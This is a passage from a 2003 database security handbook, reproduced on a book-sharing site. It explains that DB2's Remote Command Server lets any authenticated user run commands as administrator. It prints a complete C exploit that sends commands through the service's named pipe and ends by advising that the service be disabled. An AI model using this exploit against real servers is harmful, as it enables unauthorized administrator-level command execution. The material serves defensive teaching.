DB2 Remote Command Server

The DB2 Remote Command Server exists to ease administration of the DB2 server allowing users to run arbitrary commands on the remote server. Although the Remote Command Server was intended to allow administrators to run commands, commands can be run by any user, provided of course they have a user ID and password. While it is considered bad to allow everyone and their dog to run commands remotely, what exacerbates the problem is that the command runs with the privileges of the user account running the Remote Command Server. On Windows , for example, this is db2admin, which is an administrator. What this means is that a low-privileged guest account can run OS commands with administrator-level privileges.

 /* DB2 Remote Command Server Exploit 

DB2RCMD.EXE listens on a named pipe DB2REMOTECMD and executes commands sent through it. When a connection is made to the pipe a new process is created, namely db2rcmdc.exe, and this executes the command.

 */     #include <stdio.h> #include <windows.h>     int main(int argc, char *argv[]) {  char buffer[540]="";  char NamedPipe[260]="\\";  HANDLE rcmd=NULL;  char *ptr = NULL;  int len =0;  DWORD Bytes = 0;    if(argc !=3)  {   printf("\n\tDB2 Remote Command Exploit.\n\n");   printf("\tUsage: db2rmtcmd target \"command\"\n");   printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t6th September 2003\n");   return 0;  }      strncat(NamedPipe,argv[1],200);  strcat(NamedPipe,"\pipe\DB2REMOTECMD");      // Setup handshake message  ZeroMemory(buffer,540);  buffer[0]=0x01;  ptr = &buffer[4];  strcpy(ptr,"DB2");  len = strlen(argv[2]);  buffer[532]=(char)len;      // Open the named pipe  rcmd = CreateFile(NamedPipe,GENERIC_WRITEGENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);  if(rcmd == INVALID_HANDLE_VALUE)   return printf("Failed to open pipe %s. Error %d.\n",NamedPipe,GetLastError());      // Send handshake  len = WriteFile(rcmd,buffer,536,&Bytes,NULL);      if(!len)   return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError());      ZeroMemory(buffer,540);  strncpy(buffer,argv[2],254);      // Send command  len = WriteFile(rcmd,buffer,strlen(buffer),&Bytes,NULL);  if(!len)   return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError());      // Read results  while(len)  {   len = ReadFile(rcmd,buffer,530,&Bytes,NULL);   printf("%s",buffer);   ZeroMemory(buffer,540);  }    return 0; } 

Allowing users to run commands remotely is dangerous, especially if they can run commands with administrator privileges. As such this feature should not be used. Turning off the Remote Command Server will help secure the DB2 installation.



Database Hacker's Handbook. Defending Database Servers
The Database Hackers Handbook: Defending Database Servers
ISBN: 0764578014
EAN: 2147483647
Year: 2003
Pages: 156

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net